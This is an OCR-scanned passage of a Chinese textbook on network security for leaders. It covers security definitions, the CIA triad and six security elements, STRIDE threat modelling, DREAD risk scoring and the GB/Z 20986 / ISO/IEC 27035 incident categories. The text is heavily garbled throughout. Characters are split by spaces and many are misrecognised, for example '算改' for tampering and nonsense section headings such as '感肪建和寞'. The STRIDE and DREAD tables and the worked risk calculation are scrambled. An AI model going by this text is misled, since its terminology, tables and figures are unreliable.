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我 们 所 处 的 时 代 是 信息 时 代 , 移 动 互联 、 大 数据 和 云 技术 使 信 
息 与 网 络 越 来 越 成 为 人 们 日 常 工作 、 生 活 的 一 部 分 ,组 织 和 企业 的 
资源 越 来 越 集中 到 网 络 上 ,网 络 安 全 成 为 组 织 健全 发 展 的 必要 条 
件 。 作 为 领导 者 ,不 可 能 花 太 多 时 间 钻 研 技术 细节 ,但 必须 对 信息 
与 网 络 面临 的 威胁 、 各 种 防范 措施 的 适用 范围 和 效果 有 足够 了 解 ， 
才能 掌控 局 面 , 防 患 于 未 然 , 立 于 不 败 之 地 。 

我 们 知道 ,网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 
数据 受到 保护 ,不 因 偶 然 的 或 者 恶意 的 原因 而 遭受 到 破坏 、 更 改 、 泄 
露 ,系统 连续 、 可 靠 、 正 常 地 运行 ,网 络 服务 不 中 断 。 网 络 运行 的 管 
理 者 希望 对 本 地 网 络 信息 的 访问 、. 读 写 等 操作 受到 保护 和 控制 , 避 
免 出 现 “ 陷 门 ”、 病 毒 . 非 法 存 取 、 拒 绝 服务 和 网 络 资源 非法 占用 和 非 
法 控制 等 威胁 ,制止 和 防御 网 络 黑 客 的 攻击 。 安 全 保密 部 门 希望 对 
非法 的 有 害 的 或 涉及 国家 机 密 的 信息 进行 过 滤 和 防 堵 ,避免 机 要 
信息 泄露 ,避免 对 社会 产生 危害 ,给 国家 造成 巨大 损失 。 因 此 计算 
机 安全 问题 ,应 该 像 每 家 每 户 的 防火 防盗 问题 一 样 , 做 到 防 患 于 

随 着 计算 机 技术 的 迅速 发 展 , 在 计算 机 上 处 理 的 业务 也 由 基于 
单机 的 数学 运算 、 文 件 处 理 ,基于 简单 连接 的 内 部 网 络 的 内 部 业务 
处 理 、 办 公 自 动 化 等 发 展 到 基于 复杂 的 内 部 网 (Intranet)、 企 业 外 部 
网 (Extranet) 、 全 球 互 联网 (Internet) 的 企业 级 计算 机 处 理 系统 和 世 
界 范 围 内 的 信息 共享 和 业务 处 理 。 在 系统 处 理 能 力 提高 的 同时 , 系 
统 的 连接 能 力也 在 不 断 地 提高 。 但 在 连接 能 力 信 息 、 流 通 能 力 提高 
的 同时 ,基于 网 络 连接 的 安全 问题 也 日 益 突 出 ,整体 的 网 络 安全 主 
要 表现 在 以 下 几 个 方面 :网 络 的 物理 安全 .网 络 拓扑 结构 安全 、 网 络 
系统 安全 、 应 用 系统 安全 和 网 络 管理 的 安全 等 。 

本 书 深入 淡出 地 介绍 网 络 安全 的 来 龙 去 脉 ,二 十 年 来 发 生 的 网 
络 安全 大 事件 及 其 背后 的 技术 因素 ;介绍 国家 、 企 业 与 其 他 组 织 和 
个 人 可 能 面 对 的 信息 与 网 络 安全 威胁 、 各 种 防范 措施 及 其 适用 范 
和 效果 ;从 TCP/IP 模型 的 各 个 层次 介绍 网 络 的 攻击 与 防守 ;最 后 介 
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绍 当 前 主要 的 网 络 安全 解决 方案 供应 商 及 其 各 种 产品 的 大 致 工作 原理 、 接 入 方法 和 性 价 
比 评估 。 

本 书 一 方面 注意 系统 性 与 科学 性 , 另 一 方面 注意 实用 性 和 趣味 性 ,由 具有 丰富 教材 
编写 经 验 和 网 络 安全 经 验 的 教师 编写 ,面向 领导 者 ,深入 浅 出 ,通俗 易 懂 ,同时 照顾 到 技 
术 要 领 , 使 领导 者 很 容易 提纲 者 领 , 抓 住 网 络 安全 问题 的 本 质 , 有 效 开 展 工作 。 
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11 网 络 安 全 概 迷 


1994 年 中 国 互联 网 与 国际 互联 网 全 面 对 接 之 后 ,中 国 互 联网 发 展 日 新 月 异 。 现 今 我 
们 所 处 的 时 代 是 信息 时 代 , 移 动 互联 、 大 数据 和 云 技术 使 信息 与 网 络 越 来 越 成 为 日 常 工 
作 、 生 活 中 不 可 或 缺 的 重要 组 成 部 分 。 而 21 世纪 重要 的 特征 就 是 网 络 化 .数字 化 和 信息 
化 ,因此 网 络 毫 无 疑问 是 信息 时 代 的 核心 。 由 于 网 络 较 强 的 技术 性 ,网 络 安全 成 为 网 络 
中 无 法 回避 的 问题 。 计 算 机 网 络 的 种 种 特点 ,如 交互 性 .开放 性 等 ,导致 它 很 容易 受到 攻 
击 和 干扰 。 我 们 所 做 的 关于 网 络 安全 方面 的 努力 ,都 是 为 了 确保 网 络 、 系 统 中 的 信息 达 
到 保密 真实、 完整 .可 用 、 可 控 等 要 求 。 网 络 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 、 通 
信 技 术 、 密 码 技术 ,信息 安全 技术 ,应 用 数学 和 信息 论 等 多 种 学 科 的 综合 性 学 科 。 它 所 涉 
及 的 场景 很 多 ,大 到 涉及 国家 的 传统 安全 及 非 传统 安全 ,小 到 商业 企业 的 商业 机 密 信 息 
防护 ,甚至 包括 互联 网 上 不 良 信 息 的 传播 或 个 人 信息 的 泄露 。 

在 互联 网 空前 发 达 的 今天 ,每 年 发 生 的 网 络 信息 安全 事件 不 计 其 数 ,直接 或 间接 地 
造成 了 巨大 的 损失 。 网 络 安全 也 呈现 出 了 多 元 化 的 趋势 ,在 不 同 平台 上 不 停 泛 化 且 分 布 
越 来 越 广 ,如 Windows 平台 主机 外 设 、Linux 及 其 他 类 UNIX 系统 、 智 能 设备 .智能 家 
庭 .智能 穿戴 ,智能 交通 和 工控 系统 及 社会 基础 设施 都 存在 着 不 同 程度 的 网 络 安全 威胁 。 
但 网 络 安全 主要 威胁 的 途径 还 是 通过 信息 泄露 .黑客 攻击 和 病毒 人 侵 等 。 

但 安全 领域 存在 着 各 种 挑战 ,各 种 因素 交织 在 一 起 ,错综复杂 。 

首先 ,人 们 对 于 安全 这 个 概念 有 误解 。 我 们 可 以 先 体会 一 下 这 句 话 : 安全 不 是 一 件 
产品 , 它 是 一 个 过 程 。 当 人 们 遇 到 棘手 的 事情 时 ,通常 会 选择 避 开 这 些 麻 烦 。 如 果 是 无 
法 避免 的 事情 ,人 们 往往 会 期 望 一 劳 永 逸 地 解决 它 , 但 很 明显 这 是 不 现实 的 。 安 全 并 不 
是 配备 了 多 么 精良 的 设备 ,运用 了 多 么 高 深 的 技术 就 能 实现 的 。 大 多 数 人 认为 仅 依靠 设 
备 就 能 实现 安全 ,这 是 一 种 虚假 的 安全 感 。 

其 次 ,对 于 安全 的 投入 并 没有 办 法 立即 看 见 成 效 。 事 实 上 很 多 攻击 发 生 后 ,很 多 管 
理 人 员 总 会 庆幸 对 于 安全 方面 的 大 力 投入 。 很 多 时 候 , 对 于 安全 的 投入 与 可 能 造成 的 损 
失 相 比 算 不 了 什么 。 但 大 多 数 人 还 是 倾向 于 这 是 一 件 无 利 可 图 的 事 。 

再 次 ,安全 问题 并 不 像 看 上 去 那么 简单 。 有 些 安全 要 求 似 乎 很 直观 ,但 大 多 数 重要 
的 安全 服务 都 要 有 个 精确 无 误 的 词 来 描述 。 然 而 要 了 解 这 些 专 业 词汇 我 们 可 能 需要 很 多 
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积累 。 这 需要 我 们 潜心 研究 ,没有 办 法 一 跳 而 就 。 

然后 , 当 一 种 新 的 算法 或 安全 机 制 被 开发 的 时 候 ,需要 考虑 潜在 的 安全 威胁 。 大 多 
数 情况 下 ,攻击 往往 采用 我 们 最 意 想 不 到 的 方式 。 就 像 中 国 的 一 句 老 话 : 千里 之 堤 毁 于 
蚁 穴 。 因 此 ,我 们 应 从 多 角度 、 多 方面 来 精心 设计 它们 ,而 不 是 仅仅 满足 于 特定 的 安全 服 
务 要 求 。 应 在 不 同 的 场合 采取 适合 的 安全 机 制 或 算法 ,有 针对 性 地 来 解决 不 同 的 安全 服 
务 要 求 。 

最 后 ,计算 机 和 网 络 安全 实际 上 是 攻击 者 与 管理 员 或 设计 师 之 间 的 一 场 较量 。 有 这 
么 一 名 话说 得 好 : 互联 网 本 来 是 安全 的 ,自从 有 了 研究 安全 的 人 后 ,互联 网 变 得 不 安全 
了 。 出 于 种 种 目的 ,也 许 是 利益 ,也 许 是 炫耀 技术 ,也 许 只 是 生活 太 过 于 平淡 ,总 有 些 人 
企图 发 现 一 些 漏洞 来 制造 麻烦 。 但 不 同 的 是 攻击 者 只 要 发 现 一 个 漏洞 ,管理 人 员 则 需要 
做 好 对 攻击 者 行为 的 防范 .中止 和 修复 ,要 发 现 与 修 堵 所 有 漏洞 来 保证 安全 。 

另外 ,大 多 数 人 认为 强调 安全 性 对 于 系统 或 信息 使 用 的 易 用 性 或 有 效 性 有 影响 。 但 
实际 上 安全 性 大 部 分 情况 下 是 基础 ,对 于 安全 性 的 强调 完全 是 值得 的 。 


111 网 络 安全 的 定义 


网 络 安全 是 指 网 络 系统 的 硬件 .软件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 
恶意 的 原因 而 唱 受 到 破坏 、 更 改 和 泄露 ,系统 连续 可靠 .正常 地 运行 ,网 络 服务 不 中 断 。 
网 络 安全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 。 但 网 络 安 全 涉及 的 内 容 不 单 是 软 硬 
件 技术 方面 的 ,管理 方面 同样 重要 。 技 术 方 面 侧重 于 防范 外 部 的 入 侵 ,管理 方面 则 侧重 
于 内 部 人 为 因素 的 管理 。 安 全 领域 普遍 认为 “最 大 的 漏洞 就 是 人 ”。 例 如 ,社会 工程 学 就 
是 黑客 利用 人 为 因素 来 达到 自己 预想 的 目的 , 且 社 会 工程 学 认为 安全 链 中 最 薄弱 的 环境 
就 是 人 为 因素 。 因 此 只 有 做 到 人 防 , 物 防 . 技 防 合 一 ,才能 真正 实现 安全 这 个 目标 。 


112 网 络 安全 的 要 素 


既然 安全 方案 的 设计 与 实施 是 一 个 持续 的 过 程 ,我 们 需要 找到 一 些 切入 点 来 展开 工 
作 。 把 握 住 安全 方案 设计 的 思路 与 方法 ,就 能 够 设计 出 优秀 的 算法 或 安全 机 制 。 要 全 面 
的 认识 网 络 安 全 问题 ,我 们 需要 知道 网 络 安全 是 由 哪 几 种 属性 组 成 的 。 经 过 前 人 无 数 次 
的 实践 与 总 结 ,计算 机 网 络 安全 大 体 包 含有 6 个 要 素 , 即 保密 性 、 完 整 性 、 可 用 性 、 可 控 
性 、 真 实 性 和 可 审查 性 , 其 中 保密 性 (confidentiality)、 完 整 性 (integrity) 和 可 用 性 
(availability) 被 称 为 C-I-A 三 元 组 , 它 是 最 基本 的 组 成 要 素 。 


1. 保密 性 


保密 性 指 的 是 非 授 权 的 用 户 、 实 体 或 过 程 对 于 信息 无 访问 权限 ,从 而 保证 涉 密 信息 
不 被 盗 取 或 利用 的 特性 。 例 如 ,一 个 软件 需要 访问 数据 库 , 该 数据 库 的 密码 是 进行 加 密 
之 后 存储 在 一 个 受 保护 文件 中 的 ,因此 该 软件 若是 需要 访问 数据 库 ,需要 算法 、 加 密 密 
钥 、 受 保护 文件 提供 的 解密 密 钥 、 加 密 密 码 。 
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2. 完整 性 


完整 性 指 的 是 信息 在 存储 或 传输 的 过 程 中 防止 信息 被 未 经 授权 的 算 改 、 删 除 、 丢 失 
和 毁坏 的 特性 。 对 于 完整 性 的 要 求 包 含 验 证 数据 来 源 、 检 测 数 据 更 改 、 判 断 数据 来 源 是 
否 已 经 改变 。 


3. 可 用 性 


可 用 性 指 的 是 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 。 高 可 用 性 应 该 具备 以 下 属 
性 : 无 单 点 故障 ,无 单 点 修复 ,故障 隔离 出 故障 组 件 ,故障 遏制 以 防止 故障 传播 .提供 备用 


4. 可 控 性 


可 控 性 指 的 是 对 信息 的 传播 及 内 容 具 有 自主 可 控 的 能 力 , 信 息 安全 风险 在 可 控 的 范 
围 内 。 


5. 真实 性 
真实 性 指 的 是 信息 内 容 及 信息 行为 主体 具备 真实 性 。 
6. 可 审查 性 


可 审查 性 指 的 是 对 信息 内 容 及 信息 行为 可 核查 、 可 追溯 。 

保密 性 、 完 整 性 、 可 用 性 是 最 基本 的 组 成 要 素 。 虽 然后 面 扩充 了 可 控 性 、 真 实 性 、 可 
审查 性 .不 可 抵赖 性 等 要 素 ,但 在 设计 安全 方案 的 时 候 , 要 以 最 基本 的 安全 3 要 素 为 出 发 
点 来 全 面 的 考虑 问题 。 


12 网 络 安全 的 译 要 内 容 


121 物理 安全 


网 络 的 物理 安全 是 整个 网 络 安 全 的 前 提 。 一 般 情况 下 ,物理 安全 主要 包含 : 火灾 \ 洪 
水 地 震 等 环境 因素 造成 的 事故 ;电源 故障 ;人 为 操作 因素 ;设备 、 线 路 被 盗 、 被 毁坏 ;电磁 
干扰 等 。 因 此 在 设备 安置 与 防护 时 要 充分 考虑 上 述 因素 ,防止 设备 遭 到 破坏 ,并 采用 一 
系列 身份 验证 技术 来 控制 接触 设备 的 人 员 。 


122 产品 安全 


网 络 最 基本 的 元 素 是 各 式 各 样 的 信息 技术 产品 ,作为 用 户 最 常 接触 到 的 产品 和 大 多 
数 人 连接 互联 网 的 入 口 ,其 安全 性 的 要 求 之 高 不 言 而 喻 。 通 常 信息 技术 产品 包含 有 漏洞 
或 者 其 他 安全 风险 则 会 给 整个 网 络 造 成 巨大 的 破坏 。 我 们 一 般 指 的 信息 技术 产品 包括 


M4:. 


有 计算 机 及 软件 ,电信 产品 ,半导体 与 半导体 生产 设备 .科学 仪器 等 产品 , 想 要 保证 这 些 
信息 技术 产品 的 安全 主要 是 体现 在 对 这 些 产 品 的 控制 力 。 对 其 关键 技术 的 掌握 程度 、 对 
其 漏洞 和 后 门 的 测试 能 力 ,发 现 能 力 与 控制 能 力 都 是 产品 安全 中 所 必须 要 强调 的 。 


123 网 络 传输 安全 


网 络 传输 是 指 线路 经 过 电路 的 调整 变化 依据 网 络 传输 协议 来 通信 的 过 程 ,是 信息 传 
递交 换 、 共 享 的 必要 手段 。 其 需要 传输 介质 来 进行 传输 ,还 需要 传输 协议 让 计算 机 之 间 
的 相互 通信 共同 遵守 一 定 的 规则 。 网 络 传输 安全 的 主要 任务 就 是 确保 信息 资源 在 传输 
过 程 中 的 安全 性 ,使 信息 资源 符合 网 络 安全 的 六 个 要 素 ,做 到 信息 资源 不 被 非法 获取 、 算 
改 、 破 坏 等 ,从 而 实现 传输 安全 。 


124 网 络 运行 系统 安全 


信息 系统 是 由 计算 机 硬件 ,网络 和 通信 设备 .计算 机 软件 .信息 资源 .信息 用 户 和 规 
章 制度 组 成 的 ,以 处 理 信 息 流 为 目的 的 人 机 一 体 化 系统 , 它 需 要 做 到 的 是 为 用 户 提供 安 
全 可 靠 的 服务 。 但 随 着 技术 不 断 发 展 ,信息 系统 现在 不 止 面临 着 种 类 繁多 的 外 部 攻击 ， 
自身 也 包含 着 许多 危害 性 极 大 的 内 部 漏洞 。 为 了 确保 信息 系统 的 安全 以 及 系统 服务 持 
续 可 用 ,一 般 需要 定期 对 系统 进行 安全 评估 、 异 常任 务 排查 、 补 丁 升级 、 维 护 维修 等 技术 
手段 。 


125 网 络 系统 设计 与 实施 的 安全 


网 络 安全 只 保证 网 络 运行 系统 安全 是 不 够 的 ,其 最 初 的 设计 与 实施 则 是 很 多 人 忽视 
的 方面 。 不 合理 的 设计 与 不 规范 的 实施 都 会 造成 不 同 程度 的 安全 威胁 , 且 此 类 安全 威胁 
对 后 期 的 影响 比 想象 中 的 要 大 许多 。 对 于 设计 与 实施 服务 提供 商 应 尽 可 能 考虑 多 方面 
的 因素 并 使 系统 符合 相关 国家 法 律 法 规 和 规范 标准 。 而 用 户 所 用 系统 也 应 由 具备 相应 
安全 资质 和 服务 能 力 的 机 构 设 计 与 实施 。 


126 管理 安全 


正如 之 前 网 络 安全 定义 中 所 讲 的 ,网 络 安全 不 光 指 技术 层面 ,也 包含 管理 部 分 。 而 
从 以 往 经 验 来 看 ,网 络 安全 最 大 的 风险 都 是 来 自 于 内 部 。 为 了 实现 内 部 人 为 因素 的 安 
全 ,部 门 与 单位 应 制定 完善 的 安全 管理 制度 与 法 规 ,以 此 规范 内 部 人 员 的 行为 .操作 等 ， 
避免 信息 泄露 、 算 改 或 破坏 ,使 攻击 者 无 机 可 乘 。 


13 感 肪 建 和 寞 


我 们 将 可 能 造成 危害 的 来 源 称 之 为 威胁 ,把 可 能 出 现 的 损失 称 之 为 风险 ,风险 一 定 
与 损失 是 相关 联 的 。 因 此 威胁 分 析 和 风险 分 析 两 个 阶段 并 不 同 ,但 联系 得 很 紧密 。 
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威胁 建 模 有 许多 方法 ,例如 ,头脑 风暴 法 。 当 然 也 有 比较 科学 的 方法 ,比如 对 威胁 进 
行 建 模 。 威 胁 建 模 有 五 个 主要 步骤 。 应 当 通 过 重复 执行 步骤 二 至 步 又 五 逐步 细 化 威胁 
建 模 。 威 胁 建 模 的 五 个 步骤 如 下 。 

步骤 一 : 确定 安全 目标 。 目 标清 晰 有 助 于 将 注意 力 集中 在 威胁 建 模 活动 上 ,已 经 确 
定 后 序 步骤 要 做 多 少 工作 。 

步骤 二 : 创建 应 用 程序 概述 。 逐 条 列 出 应 用 程序 的 重要 特征 和 参与 者 ,有 助 于 在 步 
又 四 中 确定 相关 威胁 。 

步骤 三 : 分 解 应 用 程序 。 全 面 了 解 应 用 程序 的 

1. Identify Security 
结构 可 以 使 用 户 更 轻松 地 发 现 更 相关 、 更 具体 的 Objectives 
威胁 。 个 

步骤 四 : 确定 威胁 。 使 用 步 又 二 和 步骤 三 中 的 
详细 信息 来 确定 与 用 户 的 应 用 程序 方案 和 上 下 文 相 
关 的 威胁 。 

步骤 五 : 确定 漏洞 。 检 查 应 用 程序 的 各 层 以 确 
定 与 威胁 有 关 的 弱点 。 使 用 漏洞 类 别 来 帮助 用 户 关 
注 最 常 出 现 错误 的 区 域 。 

威胁 建 模 如 图 1. 1 所 示 。 

一 般 情 况 下 需要 考虑 哪些 威胁 与 安全 性 属性 
呢 ? 我 们 可 以 采用 微软 公司 提出 的 STRIDE 模型 。 
STRIDE 是 Spoofing (假冒 )、Tampering ( 算 改 )、 
Repudiation( 和 否认 ) .Information Disclosure( 信 息 汇 露 )、Denial of Service( 拒 绝 服务 ) 和 
Elevation of Privilege( 提 升 权限 ) 的 字母 缩 略 词 。 分 别 对 应 的 定义 与 安全 属性 如 下 。 

(1) 假冒 的 定义 为 冒充 他 人 身份 ,对 应 的 安全 属性 为 身份 验证 。 

(2) 算 改 的 定义 为 修改 数据 或 代码 ,对 应 的 安全 属性 为 完整 性 。 

(3) 否认 的 定义 为 否认 做 过 的 事 , 对 应 的 安全 属性 为 认可 。 

(4) 信息 泄露 的 定义 为 机 密 信息 泄露 ,对 应 的 安全 属性 为 机 密 性 。 

(5) 拒绝 服务 的 定义 为 拒绝 服务 ,对 应 的 安全 属性 为 可 用 性。 

(6) 提升 权限 的 定义 为 未 经 授权 获得 许可 ,对 应 的 安全 属性 为 授权 。 

我 们 可 以 用 数据 流 图 来 说 明 系 统 部 件 与 相关 的 威胁 。 系 统 流 图 包括 4 个 元 素 : 数据 
流 ,数据 存储 、 进 程 和 交互 方 。 而 对 于 威胁 建 模 ,应 另外 增加 一 个 元 素 为 信任 边界 。 数 据 
流 表示 通过 网 络 连接 、 命 名 管道 .邮件 槽 .RPC 通道 等 移动 的 数据 ;数据 存储 表示 文件 、 数 
据 库 ,注册 表 项 以 及 类 似 项 ;进程 指 的 是 计算 机 运行 的 计算 或 程序 ;交互 方 指 的 是 系统 的 
端点 , 即 人 、Web 服务 和 服务 器 。 通 常 , 他 们 是 数据 提供 方 , 或 处 于 系统 范围 之 外 但 与 系 
统 相关 的 用 户 。 信 任 边界 表示 可 信 元 素 与 不 可 信 元 素 之 间 的 边界 。STRIDE 模式 提供 
了 一 个 表格 来 说 明 这 些 元 素 可 能 涉及 的 威胁 .如 表 1.1 所 示 。 
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1.1 威胁 建 模 


表 1.1 STRIDE 模式 


元 素 假 冒 自 改 否 认 信息 泄露 拒绝 服务 提升 权限 
数据 流 Vv ~V V/ 

数据 存储 Vv V V 

进程 V Vv Vv V V V 
交互 方 Vv Vv 


在 维护 系统 安全 时 ,安全 工程 师 花 费 很 多 时 间 与 精力 实施 安全 方案 ,但 攻击 者 却 往 
往 利用 了 方案 规划 设计 时 没 考虑 进去 的 漏洞 ,从 而 轻而易举 地 完成 人 侵 。 这 就 是 在 确定 
攻击 面 时 考虑 得 不 够 完善 .不 够 全 面 导致 的 。 建 模 时 也 可 以 采用 一 些 工具 进行 辅助 , 比 
如 微软 公司 的 安全 性 开发 生命 周期 (SDL) 威 胁 建 模 工具 。 


14 风险 建 复 


人 们 要 对 风险 建 模 ,首先 需要 知道 风险 是 由 哪些 因素 组 成 的 。 一 般 情况 下 ,风险 = 
发 生 的 概率 (Probability) XX 潜在 的 损失 (Damage Potential) 。 如 何 更 科学 地 衡量 风险 呢 ? 
一 般 的 方法 是 使 用 微软 公司 提出 的 DREAD 模型 ,DREAD 是 几 个 单词 首 字母 的 缩写 。 
在 这 个 模型 中 ,我 们 需要 考虑 几 个 因素 。 

(1) 潜在 损失 : 如 果 缺 陷 被 利用 ,损失 有 多 大 ? 

(2) 重 现 性 : 重复 产生 攻击 的 难度 有 多 大 ? 

(3) 可 利用 性 : 发 起 攻击 的 难度 有 多 大 ? 

(4) 受 影响 的 用 户 : 用 粗略 的 百分数 表示 ,有 多 少 用 户 受 到 影响 ? 

(5) 可 发 现 性 : 缺陷 容易 发 现 吗 ? 

按 上 述 公式 表明 ,特定 威胁 造成 的 危险 等 于 威胁 发 生 的 概率 乘 以 潜在 的 损失 ,这 表 
明了 如 果 攻 击发 生 将 会 对 系统 造成 的 后 果 。 可 以 用 等 级 1 一 10 来 衡量 概率 ,这 里 1 表示 
威胁 非常 不 可 能 发 生 , 而 10 表示 几乎 肯定 发 生 。 同 样 ,可 以 用 等 级 1 一 10 来 衡量 潜在 的 
损失 ,这 里 1 表示 最 小 的 损失 ,而 10 表示 大 灾难 。 用 这 种 方法 ,发 生 概 率 低 但 潜在 损失 
大 的 威胁 造成 的 危险 等 于 潜在 损失 有 限 但 非常 有 可 能 发 生 的 威胁 所 造成 的 危险 。 例 如 ， 
让 Probability=10 and DamagePotential=1, then Risk=10X1 = 10. If Probability= 1 
and DamagePotential 二 10, then Risk 王 1X10 王 10。 这 种 方法 导致 分 为 等 级 1 一 100 ,可 
以 将 这 些 等 级 分 成 高 .中 、 低 危险 三 级 。 在 DREAD 模型 中 有 这 么 一 个 评价 表 , 我 们 可 以 
从 中 判断 一 个 威胁 的 风险 程度 ,如 表 1.2 所 示 。 

询问 完 上 述 问题 后 ,计算 给 定 威胁 的 值 (1 一 3) ,结果 范围 为 5 一 15。 这 样 就 可 以 将 总 
分 12 一 15 的 威胁 评价 为 高 度 危险 ;8 一 11 的 威胁 评价 为 中 度 危 险 ;5 一 7 的 威胁 评价 为 低 
度 危险 。 例 如 ,攻击 者 通过 监视 网 络 获得 身份 验证 凭据。 可 做 出 如 下 评价 ,如 表 1. 3 
所 示 。 
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表 1.2 DREAD 模型 


评 价 高 (3) 中 (2) 低 (1) 
攻击 者 可 以 暗中 破坏 安 
- 全 宇 全 信 
潮 在 的 损失 。 | 全 系统 ,获取 完全 信任 的 | 泄露 敏感 信息 泄露 价值 不 高 的 信息 


(Damage Potential) 


授权 ,以 管理 员 的 身份 运 
行程 序 , 上 传 内 容 


攻击 每 次 可 以 重 现 ,但 


重 现 性 攻击 每 次 可 以 重 现 , 而 且 | 只 在 一 个 时 间 间 隔 和 | 攻击 很 难 重 现 , 即 使 很 了 
(Reproducibility) | 不 需要 时 间 问 隔 一 种 特定 的 竞争 条 件 | 解 安全 漏洞 
下 才能 进行 
.jij | 钼 练 编程 人 员 可 以 圳 | 这 类 攻击 需要 非常 老练 
可 利用 性 。 | 编程 新 手 在 短 时 间 内 就 | 行 这 类 攻击 ,然后 重复 | 的 人 员 才能 进行 ,并 对 每 
(Exploitability) 可 以 进行 这 类 攻击 进行 这 些 步 双 次 攻击 都 有 深入 的 了 解 


受 影响 的 用 户 
(Affected users) 


所 有 的 用 户 ,默认 配置 ， 
主要 客户 


一 些 用 户 , 非 默认 配置 


极 少 的 用 户 , 特 点 不 明 
确 ,影响 匿名 用 户 


公开 解释 攻击 的 信息 ;可 


产品 中 很 少 使 用 部 分 
的 缺陷 ,只 有 少量 的 用 


发 更生 | 以 在 最 常用 功能 中 找到 | 户 可 能 遇 到 。 判断 是 eater 
: | 的 缺陷 ,非常 明显 否 是 恶意 使 用 需要 花 | ” 
费 一 些 心机 
表 1.3 DREAD 模型 例子 
D R E A D 总 计 得 分 
了 3 名 2 12 高 


以 上 说 的 是 DREAD 模式 。 但 在 许多 实例 中 ,综合 的 风险 建 模 会 消耗 大 量 的 时 间 ， 
且 效 率 低下 。 因 此 一 些 公司 或 组 织 会 选择 一 种 风险 评估 流程 用 于 专注 他 们 的 项 目 业务 。 
大 体 有 以 下 几 个 步骤 : 

(1) 定义 系统 中 所 有 数据 类 型 ,包括 保密 性 、 完 整 性 和 可 用 性 (CIA) 上 的 需求 一 一 信 
用 卡 数据 、 身 份 验证 .用 户 联系 信息 等 。 

(2) 定义 所 有 有 风险 的 人 员 一 一 外 部 恶意 黑客 .内 部 恶意 黑客 .活动 分 子 、 企 业 级 间 
谍 行 为 等 。 

(3) 定义 所 有 有 用 实例 一 一 创建 账号 .下 订单 等 。 

(4) 对 每 个 用 户 实例 ,定义 应 用 流程 如 何在 系统 组 件 中 进行 。 组 件 可 以 是 高 层次 的 
(物理 服务 器 ) 或 是 低层 次 (设计 层 的 构建 ) 一 一 商业 逻辑 层 , 展 现 层 等 。 并 且 记 录 哪 些 数 
据 将 在 该 用 户 实 例 中 调用 ,以 及 相应 的 CIA 需求 。 

(5) 对 于 每 种 操作 ,罗列 所 涉及 的 攻击 载体 .并 查看 这 些 载 体 在 您 的 系统 中 是 否 存 
在 。 比 如 ,如 果 一 个 用 户 实例 包含 数据 库 连 接 , 那 么 SQL 注入 是 一 种 很 可 能 的 攻击 载 
体 。 您 可 以 参考 外 部 资源 , 即 OWASP ASVS、WASC 风险 分 类 ,或 以 SANS/CWE 的 前 
25 位 风险 为 参考 建议 。 

(6) 评估 每 种 潜在 风险 的 危险 性 并 定义 策略 ,比如 使 用 存储 过 程 来 防止 SQL 注入 。 
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(7) 在 一 份 统 一 报告 中 记录 所 有 这 些 内 容 , 并 在 程序 员 开 始 编码 前 提交 给 他 们 。 

尽管 更 科学 的 风险 的 优势 显而易见 ,但 执行 一 个 开销 如 此 之 大 的 活动 ,通常 一 个 开 
发 团队 并 不 愿意 承担 风险 建 模 的 重担 。 因 此 对 于 一 般 情况 .敏捷 风险 建 模 可 能 是 更 好 的 
选择 。 例 如 ,便捷 式 风 险 分 析 流 程 (Facilitated Risk Analysis Process,FRAP) ,快速 威胁 
建 模 (Threat Modeling Express,TME) 等 方法 。 


15 安全 事件 分 类 


由 我 国 参与 编制 的 国际 标准 ISO/IEC 27035《 信 息 技 术 、 安 全 技术 、 信 息 安 全 事件 管 
理 ) 于 2011 年 7 月 12 日 通过 了 国际 标准 编制 最 终 阶段 FDIS 的 投票 表决 ,并 于 9 月 1 日 
正式 发 布 。 该 标准 在 原 国际 标准 ISO/IEC TR 18044 :2004《 信 息 技 术 、 安 全 技术 ,信息 安 
全 事件 管理 ) 的 基础 上 增加 了 我 国 国家 标准 GB/Z 20986-2007《 信 息 安全 技术 、 信 息 安全 
事件 分 类 分 级 指南 ) 的 内 容 。 我 国 专 家 作为 该 标准 项 目的 共同 编辑 ,参与 了 标准 制定 的 
全 过 程 。 

2008 年 4 月 ,ISO/IEC JTC1 SC27 提出 了 ISO/IEC 27035 新 工作 项 ,其 主要 内 容 是 
将 技术 报告 ISO/IEC TR 18044:2004 转化 为 国际 标准 。2008 年 4 月 SC27 WG4 京都 会 
议 上 ,在 全 国信 息 安全 标准 化 技术 委员 会 的 组 织 下 ,我 国 代表 基于 我 国 国家 标准 GB/Z 
20986-2007 ,向 SC27 提交 了 《信息 安全 事件 分 类 分 级 指南 ) 的 新 工作 项 目 提案 ,得 到 与 会 
各 国 代表 的 认可 ,作为 研究 项 目 立 项 。 同 年 10 月 SC27 WG4 塞浦路斯 全 体会 议决 定 将 
我 国 提案 纳入 ISO/IEC 27035 项 目 , 建 议 由 日 本 专家 和 我 国 专家 共同 担任 该 项 目的 编 
辑 , 在 2009 年 5 月 SC27 北京 全 体会 议 上 ,该 建议 得 到 SC27 的 正式 确认 。 这 是 我 国 第 一 
次 在 信息 安全 领域 将 国家 标准 转化 为 国际 标准 。 

经 过 3 年 的 努力 ,ISO/VIEC 27035 的 编制 工作 已 经 顺利 完成 。 该 国际 标准 与 ISO/ 
IEC TR 18044:2004 的 最 大 区 别 在 于 引入 了 基于 我 国 提案 的 信息 安全 事件 分 类 分 级 内 
容 。 其 中 GB/Z 20986-2007 对 信息 安全 事件 进行 了 分 类 。 


151 有 害 程 序 事件 


有 害 程 序 事件 (Malware Incidents,MIJ) 是 指 蓄意 制 造 、 传 播 有 害 程序 ,或 是 因 受到 有 
害 程序 的 影响 而 导致 的 信息 安全 事件 。 有 害 程序 是 指 插入 到 信息 系统 中 的 一 段 程序 。 
有 害 程 序 危害 系统 中 数据 .应 用 程序 或 操作 系统 的 保密 性 、 完 整 性 或 可 用 性 ,影响 信息 系 
统 的 正常 运行 。 其 中 包括 如 下 7 个 子 类 

(1) CVI 一 一 计算 机 病毒 事件 (Computer Virus Incidents) 。 

(2) WI 一 一 蠕虫 事件 (Worms Incidents) 。 

(3) THI 一 一 特洛伊 木马 事件 (Trojan Horses Incidents) 。 

(4) BI 一 一 僵尸 网 络 事件 (Botnets Incidents) 。 

(5) BAI 一 一 混合 攻击 程序 事件 (Blended Attacks Incidents) 。 

(6) WBPI 一 一 网 页 内 艇 恶意 代码 事件 (Web Browser Plug-Ins Incidents)。 
